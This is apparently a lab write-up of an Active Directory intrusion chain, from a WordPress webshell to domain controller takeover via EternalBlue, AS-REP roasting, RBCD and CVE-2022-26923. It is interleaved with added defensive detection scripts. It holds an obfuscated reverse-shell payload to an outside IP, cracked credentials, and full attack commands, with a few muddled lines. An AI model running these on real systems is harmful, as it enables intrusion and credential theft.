CVE-2022–26923 && RBCD Attack domain controller


NetDing Cup semi-final review target

Target introduction: This target is a review of the internal network range from the final of the 3rd NetDing Cup (2022). Completing this challenge helps players understand proxy forwarding, internal network scanning, information collection, privilege escalation and lateral movement techniques in internal network penetration. It strengthens the understanding of the core authentication mechanism of the domain environment and teaches some interesting technical points of domain environment penetration. There are a total of 4 flags in this target range, distributed across different target machines.

Initial information collection

At the beginning an IP address was given: 39.101.173.234. Checking the source code, it is a WordPress site, version WordPress 6.4.3.

<?=`$_GET[1]`;echo md5(1);?>

Interactive Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm-256color
Ctrl-Z
stty raw -echo;fg
reset (Enter)

frp tunnel

# Server side: run on Kali. Create frps.toml manually, then start it with: frps -c frps.toml
bindPort = 7000

# Client side: run on the target. Create frpc.toml, then start it with: frpc -c frpc.toml

serverAddr = "Outbound Machine"
serverPort = 7000

[[proxies]]
name = "socks5"
type = "tcp"
remotePort = 6001

[proxies.plugin]
type = "socks5"

Internal network penetration

Here we scan the other internal network hosts: upload fscan to collect information.

Here is the internal network information; let's analyze it roughly. 172.22.15.26 is the address of the current target machine. 172.22.15.24 may have a BlueKeep vulnerability.

[*] NetBios: 172.22.15.35 XIAORANG\XR-0687               
[*] NetBios: 172.22.15.13 [+]DC XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393 Domain Controller
[*] 172.22.15.13 (Windows Server 2016 Standard 14393)
[*] NetBios: 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios: 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393
[*] WebTitle: http://172.22.15.18 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.15.24 code:302 len:0 title:None Redirect URL: http://172.22.15.24/www
[+] http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
[*] WebTitle: http://172.22.15.24/www/sys/index.php code:200 len:135   title:None

Here we use Kali to set up an nps proxy tunnel. Note: Kali acts as the server (nps) and the target is the client (npc); the target connects outbound...

1=system('%65%63%68%6f%20%22%59%6d%46%7a%61%43%41%74%59%79%41%69%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%54%45%75%4d%6a%49%35%4c%6a%45%31%4f%43%34%30%4d%43%38%79%4d%7a%4d%7a%49%44%41%2b%4a%6a%45%69%22%7c%62%61%73%65%36%34%20%2d%64%7c%62%61%73%68');
%65%63%68%6f%20%22%59%6d%46%7a%61%43%41%74%59%79%41%69%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%54%45%75%4d%6a%49%35%4c%6a%45%31%4f%43%34%30%4d%43%38%79%4d%7a%4d%7a%49%44%41%2b%4a%6a%45%69%22%7c%62%61%73%65%36%34%20%2d%64%7c%62%61%73%68
## Directly launch shell

nps tunnel setup

Set up a socks5 proxy on port 3333. Found an OA system; tested it, no holes. This host has port 445 open; tested it with the EternalBlue vulnerability, broke through, and pivoted to the Kali system through the socks5 proxy. Successfully penetrated the internal network host using the EternalBlue vulnerability.


Hash attack EternalBlue

You need to try several times here to obtain the system hash for the attack.

proxychains psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk

Find the second flag on the desktop. Modify the target's password and log in to the system; the password is found to be P@ssw0rd. Skipping a step, you can obtain the domain controller user's password by hash cracking.

AS-REP Roasting

The focus is on AS-REP Roasting: finding users without Kerberos pre-authentication through the GetNPUsers.py script of the Impacket project.

proxychains GetNPUsers.py -dc-ip 172.22.15.13 -usersfile user.txt xiaorang.lab/

└─# cat info.txt
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:4edd243c2c1f4bd328ed24246e3ca211$e161952a72cb7ad976a9e89506d436fcd41813ce6f3bf2d8962f57f7c51d37b3bfd72fa100e17ec4042e6b0d71ac1b1b007904d1584aed3fd74014619efd1cfb37f2cbac2dc1af009597798b6945b43635be444cdcbff667af24bcf4bde03eb9c3ce9f6091e5576609319899269e56785612d0100177e3b231a8079b109f8c2177c8497ba01c406820788150f0416ca3d5281b0c07e04fc99e522289acf3cc044caa6f43f352b3814953548080c91a42139b871282dd798b292ba0664ec76421544a827be50120a4ea33171e7b2eb7a6b4ddf71546b2c8dfaa22f429d68ce1407832975ca63c64d77e3a
The encrypted information is: $krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:0931e76d1e9d4d6ed6f1d319951c41f4$cae152308b3a0eeb02a237e406e63525e75ee35ef6440f2c7aa5e903f0d429fe312e5eaf8a4ae9a85c1fc388c0661427dfd39d34fb7cdd0fc0db22a702374ef5ad1e6163da0c9b29593b06aba295b6158bf14490a8298f203518b6ae52eceab7d097a05793e553fa5625571b5b9dcadaa45f1b19fab01364c80e0bd75f71124c1a187048d3cbc560f9d83b164a6d9c0b92a278607410b7fdf0da863264587f2f9413b81e9fa3b37221f43ab434245f43143f439ec6c4a4509cd92804de8fd1f7ef76a8329163cb0ffeae217b4499beb0949c76846740d307b4f8e4bc5a3cb604b68ae23cc7425f60d6a51ea3
hashcat -m 18200 --force -a 0 '$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:6ffcf41f6cdd4b4acb52369067cf6c40$2f2e3803acb784f628944d79f36c2f39dbb2b0472b8b004178e3faf5bb4b0c6a98ddcbfe09335a73661abce181afd3c2ae28b29069617bf9e4c71a2f0a7ec7d5243eceee8538d3f13c8e2ffa23e0ba734dd6565949c6c8bc9f22799ae14946084b743d6b7df46fbddbc18903a8cb7f21c95886511809ae62c2a0c2e431d8852c1fcfce5cd96240493bc8110f32eca6895dc23c865431a211a5b9fd1023f57017432da2d47035992efed3a6ca1b3e784679139f73ff0ff26fec51cb6accc3e86e50bbe7e8d86d5df3d93c87a7d54360fc8512c3d8303e6880650f45a9cfad4dd2a4b64f108c64d570d4f5' rockyou.txt

lixiuying@xiaorang.lab/winniethepooh
huachunmei@xiaorang.lab/1qaz2wsx
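From the defender's side, the two findings above (accounts with pre-authentication disabled, and the RC4-encrypted AS-REP that becomes a `$krb5asrep$23$` hash) are both auditable. The following is an added example, not part of the writeup and not Impacket code: it audits constructed user records for the DONT_REQ_PREAUTH bit of userAccountControl and filters constructed 4768 (TGT request) events for the no-pre-auth, RC4 pattern. Only the account names are taken from the writeup; the flag values, events and the `svc_legacy` account are constructed.

```python
# Added example, not part of the original writeup. Two defensive checks for the
# AS-REP Roasting step: (1) an LDAP-side audit of accounts with "Do not require
# Kerberos preauthentication" set, (2) a filter over 4768 (TGT request) events
# for the pattern that produces $krb5asrep$23$ hashes. All records below are
# constructed sample data; only the account names come from the writeup.

DONT_REQ_PREAUTH = 0x400000   # userAccountControl bit: pre-authentication not required
ACCOUNTDISABLE = 0x0002       # userAccountControl bit: account disabled
NORMAL_ACCOUNT = 0x0200       # userAccountControl bit: ordinary user account

# Constructed userAccountControl values (hypothetical, not read from the target).
SAMPLE_USERS = [
    {"sAMAccountName": "lixiuying",     "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "huachunmei",    "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "svc_legacy",    "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE},
    {"sAMAccountName": "administrator", "userAccountControl": NORMAL_ACCOUNT},
]

# Constructed 4768 events, reduced to the fields the check needs.
# PreAuthType 0 = no pre-authentication data in the AS-REQ;
# TicketEncryptionType 0x17 = RC4-HMAC, i.e. the etype 23 in "$krb5asrep$23$";
# Status 0x0 = ticket issued (0x6 = client principal unknown).
SAMPLE_4768 = [
    {"TargetUserName": "lixiuying",     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "administrator", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "huachunmei",    "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "nosuchuser",    "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x6"},
]

def roastable_accounts(users):
    """Enabled accounts whose TGT can be requested without pre-authentication."""
    return [u["sAMAccountName"] for u in users
            if u["userAccountControl"] & DONT_REQ_PREAUTH
            and not u["userAccountControl"] & ACCOUNTDISABLE]

def remediated_uac(uac):
    """userAccountControl value to write back to re-enable pre-authentication."""
    return uac & ~DONT_REQ_PREAUTH

def asrep_roast_events(events):
    """Target users of successful TGT issuances with no pre-auth and RC4 encryption."""
    return [e["TargetUserName"] for e in events
            if e["PreAuthType"] == "0"
            and e["TicketEncryptionType"].lower() == "0x17"
            and e["Status"] == "0x0"]

if __name__ == "__main__":
    print("roastable accounts:", roastable_accounts(SAMPLE_USERS))
    print("AS-REP roast events:", asrep_roast_events(SAMPLE_4768))
```

In a real domain the user records come from an LDAP query for `(userAccountControl:1.2.840.113556.1.4.803:=4194304)` and the events from the domain controllers' Security logs; a burst of matching 4768 events for many users from one source address is the signature of the `-usersfile` sweep shown above.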

Remote login:

172.22.15.35 (XIAORANG\XR-0687): log in via RDP on port 3389

lixiuying@xiaorang.lab/winniethepooh

CVE-2022–26923 && RBCD Attack domain controller


#Enumerate lixiuying user's DACL on the current machine using powerview

Import-Module .\PowerView.ps1
Get-DomainUser -Identity lixiuying -Properties objectsid
Get-DomainObjectAcl -Identity XR-0687 | ?{$_.SecurityIdentifier -match "S-1-5-21-3745972894-1678056601-2622918667-1131"}


#Add machine user HACK01/Qwer1234 using Powermad

Import-Module .\Powermad.ps1
$Password = ConvertTo-SecureString 'Qwer1234' -AsPlainText -Force
New-MachineAccount -MachineAccount "HACK01" -Password $($Password) -Domain "xiaorang.lab" -DomainController "XR-DC01.xiaorang.lab" -verbose

PS C:\Users\lixiuying\Desktop\11> net group "domain Computers" /domain
This request will be processed by the domain controller of the domain xiaorang.lab.

Group Name Domain Computers
Comment All workstations and servers joined to the domain

Member

-------------------------------------------------------------------------------
HACK01 XR-0687 XR-CA


# Add machine account and configure resource delegation
## Method 1:
The machine user HACK01 just created is added to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the target machine

# Import module
Import-Module .\PowerView.ps1
# Obtain the SID of HACK01 account
Get-NetComputer "HACK01" -Properties objectsid
# Attempt to configure resource-based constrained delegation from HACK01 to XR-0687
$A = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3745972894-1678056601-2622918667-1147)"
$SDBytes = New-Object byte[] ($A.BinaryLength)
$A.GetBinaryForm($SDBytes, 0)
Get-DomainComputer XR-0687 | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Verbose
# Check if the configuration is successful
Get-DomainComputer XR-0687 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

# If you want to clear the msds-allowedtoactonbehalfofotheridentity attribute value, you can clear it with the following command
Set-DomainObject XR-0687 -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose

## Method two:
# SharpAllowedToAct.exe tool adds machine accounts and configures resource delegation
SharpAllowedToAct.exe -m HACK01 -p P@$$w0rd -t XR-0687 -a XR-DC01.xiaorang.lab -d xiaorang.lab
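Both methods above end with a security descriptor written into msDS-AllowedToActOnBehalfOfOtherIdentity, and the later rbcd.py and passthecert.py steps write the same attribute on XR-0687$ and XR-DC01$. Auditing that attribute is the corresponding defensive check. The following is an added example, not from the writeup or from PowerView: it parses the SDDL form of the descriptor (the string from Method 1 is reused), decodes the ACE rights, and reports any trustee SID that is not on an approved delegation list (the approved list is a constructed assumption).

```python
import re

# Added example, not part of the original writeup. Audits the DACL stored in a
# computer object's msDS-AllowedToActOnBehalfOfOtherIdentity attribute. The SDDL
# string is the one used in the writeup; the approved-SID list is a constructed
# assumption (in practice: the SIDs your change records say may delegate).

# Two-letter SDDL access-right codes for directory objects.
RIGHT_NAMES = {
    "CC": "Create Child", "DC": "Delete Child", "LC": "List Children",
    "SW": "Self Write", "RP": "Read Property", "WP": "Write Property",
    "DT": "Delete Tree", "LO": "List Object", "CR": "Control Access",
    "SD": "Delete", "RC": "Read Control", "WD": "Write DAC", "WO": "Write Owner",
    "GA": "Generic All", "GR": "Generic Read", "GW": "Generic Write", "GX": "Generic Execute",
}

DACL_RE = re.compile(r"D:[A-Z]*((?:\([^()]*\))+)")   # "D:" + optional DACL flags + ACE list
ACE_RE = re.compile(r"\(([^()]*)\)")                  # one parenthesised ACE

RBCD_SDDL_FROM_WRITEUP = (
    "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;"
    "S-1-5-21-3745972894-1678056601-2622918667-1147)"
)

def parse_rbcd_sddl(sddl):
    """Return one dict per ACE in the DACL: ACE type, trustee SID, decoded rights."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for ace in ACE_RE.findall(m.group(1)):
        fields = ace.split(";")
        if len(fields) < 6:
            continue                      # malformed ACE: skip rather than guess
        ace_type, _flags, rights, _obj, _inh_obj, sid = fields[:6]
        tokens = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "sid": sid,
                     "rights": [RIGHT_NAMES.get(t, t) for t in tokens]})
    return aces

def unexpected_delegators(sddl, approved_sids):
    """SIDs granted an Allow ACE that are not on the approved delegation list."""
    return [a["sid"] for a in parse_rbcd_sddl(sddl)
            if a["type"] == "A" and a["sid"] not in approved_sids]

if __name__ == "__main__":
    for ace in parse_rbcd_sddl(RBCD_SDDL_FROM_WRITEUP):
        print(ace["type"], ace["sid"], ", ".join(ace["rights"]))
    # Constructed approved list: empty, so the HACK01 SID is reported.
    print("unexpected:", unexpected_delegators(RBCD_SDDL_FROM_WRITEUP, set()))
```

The attribute is stored as a binary security descriptor; on a Windows host it can be turned into the SDDL string this parser expects with `(New-Object Security.AccessControl.RawSecurityDescriptor($bytes, 0)).GetSddlForm('All')`. Rights expressed as a hex mask rather than letter codes are passed through undecoded. Any computer, and especially a domain controller, whose attribute names a SID outside the approved list should be investigated and, as the writeup's own clean-up line shows, the attribute cleared.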

Note (bug): if there is a duplicate here, create a TEST user again. Here, execute the connection:

export KRB5CCNAME=Administrator.ccache

└─# proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk                                                                        

Impacket v0.12.0.dev1+20231015.203043.419e6f24 - Copyright 2023 Fortra

[*] Requesting shares on XR-0687.xiaorang.lab.....
[*] Found writable share ADMIN$
[*] Uploading file ALlkCtIy.exe
[*] Opening SVCManager on XR-0687.xiaorang.lab.....
[*] Creating service fEOz on XR-0687.xiaorang.lab.....
[*] Starting service fEOz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>
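The psexec output above shows the artefacts this step leaves on the target: a file with a random eight-letter name written to ADMIN$ and a service with a random four-letter name installed to run it. The following is an added example, not from the writeup and not Impacket code: it parses constructed Windows event records (5145 share access and 7045 service install) flattened to key=value lines, flags installs matching that pattern, and correlates each with the ADMIN$ write that delivered the binary. The service and file names are reused from the output above; the IP address and the other services are constructed.

```python
import re

# Added example, not part of the original writeup and not Impacket's code.
# Detects the trace a psexec-style session leaves on the target: an executable
# with a random 8-letter name copied into ADMIN$ (event 5145) and a service with
# a random 4-letter name installed to run it (event 7045). Log lines are
# constructed in a flattened key=value form; names from the writeup's output are
# reused, the source IP and the other two services are hypothetical.

SAMPLE_EVENTS = [
    'EventID=5145 ShareName="\\\\*\\ADMIN$" RelativeTargetName=ALlkCtIy.exe AccessMask=0x2 SubjectUserName=administrator IpAddress=172.22.15.26',
    'EventID=7045 ServiceName=fEOz ImagePath=%SystemRoot%\\ALlkCtIy.exe StartType=demand Account=LocalSystem',
    'EventID=7045 ServiceName=Dhcp ImagePath="%SystemRoot%\\system32\\svchost.exe -k LocalServiceNetworkRestricted" StartType=auto Account=LocalSystem',
    'EventID=7045 ServiceName=Sense ImagePath="C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe" StartType=auto Account=LocalSystem',
    'EventID=7045 ServiceName=XbLq ImagePath=%SystemRoot%\\qWerTyUi.exe StartType=demand Account=LocalSystem',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')        # key=value or key="quoted value"
RANDOM_SVC = re.compile(r"^[A-Za-z]{4}$")            # 4 random letters
RANDOM_EXE = re.compile(r"^[A-Za-z]{8}\.exe$")       # 8 random letters + .exe
EXE_RE = re.compile(r'([^\\/" ]+\.exe)', re.IGNORECASE)

def parse_event(line):
    """Split one flattened event line into a field dict, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def service_binary(image_path):
    """Basename of the service executable, ignoring directories and arguments."""
    m = EXE_RE.search(image_path)
    return m.group(1) if m else ""

def looks_like_psexec_install(ev):
    """7045 event whose service name and binary name both look randomly generated."""
    return (ev.get("EventID") == "7045"
            and RANDOM_SVC.match(ev.get("ServiceName", "")) is not None
            and RANDOM_EXE.match(service_binary(ev.get("ImagePath", ""))) is not None)

def suspicious_services(lines):
    return [ev["ServiceName"] for ev in map(parse_event, lines) if looks_like_psexec_install(ev)]

def correlate_admin_share_drops(lines):
    """Pair each suspicious service with the ADMIN$ write that delivered its binary."""
    events = [parse_event(line) for line in lines]
    drops = {ev["RelativeTargetName"]: ev for ev in events
             if ev.get("EventID") == "5145" and ev.get("ShareName", "").endswith("ADMIN$")}
    hits = []
    for ev in events:
        if looks_like_psexec_install(ev):
            exe = service_binary(ev["ImagePath"])
            drop = drops.get(exe)
            hits.append({"service": ev["ServiceName"], "binary": exe,
                         "source_ip": drop["IpAddress"] if drop else None,
                         "user": drop["SubjectUserName"] if drop else None})
    return hits

if __name__ == "__main__":
    for hit in correlate_admin_share_drops(SAMPLE_EVENTS):
        print(hit)
```

The four-letter name alone is not enough (the constructed `Dhcp` entry shows a legitimate short name), which is why the check also requires the random-looking binary name; the 5145 correlation then supplies the source address and account, which in a real investigation is the pivot back to the proxy host.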

# The next step is to read the flag

The commands are as follows:

# Privilege escalation based on resource constrained delegation (RBCD)
echo "172.22.15.35 XR-0687.xiaorang.lab" >> /etc/hosts
# Add machine user hacker1/Admin@123 via impacket-addcomputer
proxychains -q impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'hacker1$' -computer-pass 'Admin@123'
# Add the SID of the created machine user hacker1 to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the XR-0687 machine
proxychains rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker1$'
# Initiate a resource constraint delegation request for ST ticket
proxychains impacket-getST xiaorang.lab/'hacker1$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator
# Import the ticket
export KRB5CCNAME=Administrator.ccache
# Connect laterally via psexec without a password
proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk

AD domain privilege escalation vulnerability (CVE-2022-26923): penetrating host 172.22.15.18 (XR-CA.xiaorang.lab). The process of exploiting the certificate service vulnerability is as follows. Download: https://github.com/ly4k/Certipy

# Information of hosts file

└─# cat /etc/hosts
172.22.15.35 XR-0687.xiaorang.lab
172.22.15.13 XR-DC01.xiaorang.lab
172.22.15.18 XR-CA.xiaorang.lab
# Install Certipy (to get around the install error, download the attachment and run it directly on Kali)
python3 setup.py install

# Add domain resolution
echo "172.22.15.13 XR-DC01.xiaorang.lab" >> /etc/hosts
# Use certipy to enumerate the exploitable certificate templates first
proxychains certipy find -u 'lixiuying@xiaorang.lab' -p 'winniethepooh' -dc-ip 172.22.15.13 -vulnerable -stdout
# Create the machine account (called hacker2 in the text, spring$ in the command) with its DNS host name set to XR-DC01.xiaorang.lab
proxychains -q certipy account create -user 'spring$' -pass 'Admin@123' -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh'

proxychains -q certipy req -u 'spring$@xiaorang.lab' -p 'Admin@123' -ca 'xiaorang-XR-CA-CA'

# Convert certificate format, password is empty
openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
openssl rsa -in test.pem -out test.key
openssl x509 -in test.pem -out test.crt
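The condition the steps above rely on is visible in the directory: a machine account created by an ordinary user whose dNSHostName points at another host, here the domain controller, so that a certificate enrolled for it maps to that host. The following is an added example, not from the writeup and not Certipy code: it audits constructed computer records for a dNSHostName that does not match the account name, for two accounts sharing a dNSHostName (critical when the other is a DC), and for accounts created through the MachineAccountQuota (mS-DS-CreatorSID set). Host names and the -1131 SID are reused from the writeup; the userAccountControl values are the standard ones for DCs and workstations, and the records themselves are constructed.

```python
# Added example, not part of the original writeup and not Certipy code. Audits
# computer objects for the CVE-2022-26923 precondition: a machine account whose
# dNSHostName names another host (here the DC). Records are constructed sample
# data; names and the -1131 SID come from the writeup.

SERVER_TRUST_ACCOUNT = 0x2000        # userAccountControl bit set on domain controllers
WORKSTATION_TRUST_ACCOUNT = 0x1000   # userAccountControl bit set on member machines
TRUSTED_FOR_DELEGATION = 0x80000     # set on DCs by default

DOMAIN = "xiaorang.lab"

SAMPLE_COMPUTERS = [
    {"sAMAccountName": "XR-DC01$", "dNSHostName": "XR-DC01.xiaorang.lab",
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION, "mS-DS-CreatorSID": None},
    {"sAMAccountName": "XR-0687$", "dNSHostName": "XR-0687.xiaorang.lab",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT, "mS-DS-CreatorSID": None},
    # Constructed: a machine account added by an ordinary user with its dNSHostName
    # pointed at the DC, the shape the "certipy account create -dns" step produces.
    {"sAMAccountName": "spring$", "dNSHostName": "XR-DC01.xiaorang.lab",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "mS-DS-CreatorSID": "S-1-5-21-3745972894-1678056601-2622918667-1131"},
]

def expected_dns_hostname(sam_account_name, domain):
    """The only dNSHostName a computer account should legitimately carry."""
    return sam_account_name.rstrip("$").lower() + "." + domain.lower()

def check_dns_hostnames(computers, domain):
    """Return a list of findings; an empty list means no suspicious computer objects."""
    findings = []
    by_dns = {}
    for c in computers:
        dns = (c.get("dNSHostName") or "").lower()
        if dns:
            by_dns.setdefault(dns, []).append(c)
    for c in computers:
        acct = c["sAMAccountName"]
        dns = (c.get("dNSHostName") or "").lower()
        if dns != expected_dns_hostname(acct, domain):
            findings.append({"account": acct, "issue": "dNSHostName does not match account name",
                             "detail": dns or "<empty>", "severity": "high"})
        for other in by_dns.get(dns, []):
            if other is c:
                continue
            is_dc = bool(other["userAccountControl"] & SERVER_TRUST_ACCOUNT)
            findings.append({"account": acct, "issue": "dNSHostName collides with another computer",
                             "detail": other["sAMAccountName"],
                             "severity": "critical" if is_dc else "high"})
        if c.get("mS-DS-CreatorSID"):
            findings.append({"account": acct, "issue": "created through MachineAccountQuota by a non-admin",
                             "detail": c["mS-DS-CreatorSID"], "severity": "medium"})
    return findings

if __name__ == "__main__":
    for f in check_dns_hostnames(SAMPLE_COMPUTERS, DOMAIN):
        print(f["severity"].upper(), f["account"], f["issue"], f["detail"])
```

Run against a real domain, the records come from an LDAP search on `(objectClass=computer)` returning these four attributes. The check complements the May 2022 fix (which adds a SID extension to issued certificates and moves domain controllers towards strong certificate mapping): the hardening stops the certificate from being honoured, while the audit finds the account that was staged for it, and setting ms-DS-MachineAccountQuota to 0 removes the creation path the writeup uses.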

Download: https://github.com/AlmondOffSec/PassTheCert/ . There is an error on the target machine; probably the certificate for smart card authentication has not been installed on the domain controller. Try Schannel instead: pass the certificate to LDAPS through Schannel, modify the LDAP configuration (such as configuring RBCD / DCSync), and then obtain domain controller privileges. Download the above script.

cp passthecert.py https://www.freebuf.com/
chmod +x passthecert.py
# Use the above-generated pfx certificate to configure the domain controller's RBCD, note that you need to export the pfx first to .key and .crt two files
proxychains python3 passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains python3 passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'spring$'
# Finally, with RBCD granted through certificate authentication, request an ST ticket as hacker2 (spring$ in the command below)
# and take over the domain controller via psexec
proxychains -q impacket-getST xiaorang.lab/'spring$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator

# proxychains -q impacket-getST xiaorang.lab/'spring$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator

Impacket v0.12.0.dev1+20231015.203043.419e6f24 - Copyright 2023 Fortra

[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache


export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache # Import ticket
# Obtain domain controller with psexec
proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-DC01.xiaorang.lab -codec gbk


Take control of the domain controller host! The author also encountered many bugs in the simulation target test. Be careful, try more, and it will be solved in the end!


Last modified time:
admin